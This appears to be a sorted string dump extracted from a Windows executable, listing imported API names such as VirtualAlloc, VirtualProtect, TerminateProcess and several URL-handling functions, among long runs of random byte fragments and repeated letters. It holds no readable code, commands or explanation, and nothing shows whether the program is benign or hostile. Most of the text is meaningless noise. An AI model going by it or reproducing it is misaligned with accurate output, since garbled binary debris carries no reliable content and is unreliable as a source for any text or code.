GGGGGGGG
[GOas`=
]G @ OiY
-~ H_)
H||||||||||||||||||||
 `	haB
HeapCreate
HeapDestroy
HeapReAlloc
HHHHHHHHHH
hhhhhUUUUU
H}H~u'
`_hM!;
`   H|%m
h /R:@
hR?d>@
|||Hsss
^htCAN\
HX|2$`
`@hyO, 
I)<adhm
	IF{-v4
IIIIIIII
IIIIIIIIIIIII
IIIIIVVVVV
iiiiZZZZ
|Iin	l%
I_RpcFreeBuffer
IsBadWritePtr
IsDialogMessageA
IsDlgButtonChecked
IsWindow
:It)f+
I(@`@Vy
j////////////////
j:+4uh{$
JGnQju
`JJJJJJJJJJJ
JJJJJJJJJJJJJJJJJ#####000
JJJJJJJOOOUUUUUUUUUUUU      Uxxxxxxxxxxxxx222222222222
J[NN, 
J<q-mC
  K*@ !
k7=Rv/
` @k9h&@@
'KdpLj
KERNEL32.dll
&kkkkkk
kkkkkkk
kkkkkkkkkkkkkiiiiii""
kkkkkkkkkkkkkk????
KKKKKKKKKKKKKKE
KKKKKKKoooo
KKT&&QQQQQQQ...
KR|G#b
}^K;v|
KXU"rB
l `@@'
[&@ |L:
(Lj=cI@0
LLLLLLCCyyyyyyy
LLLLLLLL
lllllllllllllnnn
Lm6?hW8!
#+LUZZ
m   0\?
m5L3imL
 `M%)b
MD(@@d
MD`o7vsN/
%m_,fy)
M`MfIi+
mmmmmGGGGGGGGGGG
]]]]]]]]]]]]]]]]MMMMMMMMMM/
mmmmmmmmmmmmmmmmm
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MoveWindow
@[mpW]
M:TxPBg8
muwvnsprintfW
Mwelfdk
-MXBC4
MXyAH}#
N00Ot&
n0lCw=$
`[N1wi
 N6J77
Nac9s*
@N\f:K
n{}HW=Y'
NNNNNNN
NNNNNNNN
NNNNNNNNNNNNN
``+N#qj
nwO*``
&@`|\/o
#^O\kbT
OOO:||||||||||||||||===
OOOOOOCCCCCC
ooooooo
OOOOOOOOOOOOOOO
oooqqqqqqq(((((((((((((((((((
o+}Z]{
%?p5fM>
PathFindExtensionA
pflxL)S
|[Phx$
PKLe[Y;
PnNNQc
\'pO8h
PPfffffff88
PPPPPPPPP
PPPPPPPPPEEEEEEEEEEEEE
PPPPPPPPPPPww@
PW*  z5J
  Q|9_s
`Q"`@)C~M
qeN2JzFT
Q{>;F#
Qkartt+
]qkp-q
QQQQQQ
qqqqqqq
qqqqqqqq;;;;;""
QQQQQQQQ
QQQQQTTT::
Qrf1:lX
/QRj(  fGF/Q/6
<}Qr-p0;
@-qS.` 
QT, @NjG
quTb00
#qwhEH
R""""""":::
R8c;x^
`.rdata
RE]3Ms
ReleaseDC
.reloc
R/h"``
R&JaO*
RPCRT4.dll
RRRRRRRRRRRR
rrrrrrTiii
RtlUnwind
RU|;y&
'+RWO!
@.`@rX
RX=.@ 2
R^YS`|R
r(z9)@
^_* @s
S @@&`
SDO\#H
SendMessageA
SetDlgItemTextA
SetLastError
SetLocaleInfoW
SetUnhandledExceptionFilter
SetWindowLongA
SHLWAPI.dll
ShowWindow
SHZ28at
S!j$*,
S;"nMO0
#SO3:m
<<<<<<;;;;SS
sssssss
ssssssss
SSSSSSSSSSSSSS
sssstttGGGOiiiiiiiii
|$` =St
StringFromGUID2
>&sZAe
)[$`@t
t++++++++++++
T}A)p3
tc8}Q@
TDI	,&
TerminateProcess
T####G
tG}]5K
!This program cannot be run in DOS mode.
TlsAlloc
 `t<p&@@
\\\\\\\\\\\\\\\ttt
TTT_____________]
ttttttttttttt
ttttttv
/!.` U^
U6ye(Xiz#
U8;5"2j
uE{{{{{{{{{
)uFdb~
,`@u'M
UnregisterClassA
|~UQn^
UrlCanonical
UrlCanonicalizeW
UrlCombineA
UrlCombineW
UrlEscapeA
UrlEscapeW
UrlGetPartW
UrlUnescapeA
UrlUnescapeW
&  u^s
USER32.dll
UuidCreate
UUUUUUUUUUUUUDDDD
U^XcgT
[& `v=
v~*``E
VirtualAlloc
VirtualFree
VirtualProtect
VirtualQuery
Vk*nLPL 
VKPo.  
VtLj#Y
VVVVmmmmmmmmmmmmmmmPPAAAA
vvvvvvvkkkk
VVVVVVVVCC
!!!VVVVVVVVVVVVVVVVVV
vyh'.Y
&` w	&  
W%[3Xp
w8+=	x
wCw#6u
&  WF%
W_G_<l
WinHelpA
.@ WiX
w%nM6FfF?
wnsprintfA
wnsprintfW
WO!dSy
W:$` P
}W;,Q`
&``WRv
)))))))]]]]]]WWW
\\\\\\\\\\\WWWWWWWMMMMMMMMMM
WWWWWWWWW
WWWWWWWWWWWWW
wYD))_
x          
X0setH
X.;:1w@
<x6}  @
x8SA=&@
xCEsX3
xeY+a,
X=LQmT
` ;xTX
X<Ur<_gt
XX?HHHHHHHH
XXXXXttt
XXXXXX
XXXXXXXXXXXXXXXXXXXXX+++++++++++
;Y$@@ `
  y5o#
Y;AZ6F~:
y''F$@
Y( hC,
YLLLLLLLL
@`ylxwb
y_P(|~
>y@-r\
Y@*`@{s
]#yTgd
Y-yvpE
yyyyyyyy
yyyyyyyyyyyy
```````z
\Z/$ @
Z* `* @
>Z1MYS
	?Z7bD
Z-aEjR
-zbWJ.
z(=~K[
Z:rl(U0
\	z]tl/FI3
`@Zu&@
ZVu^:*
ZWL+~itQ
Z-,xRq
''''''ZZZ
zzzzzz
zzzzzzzYYY
ZZZZZZZZ.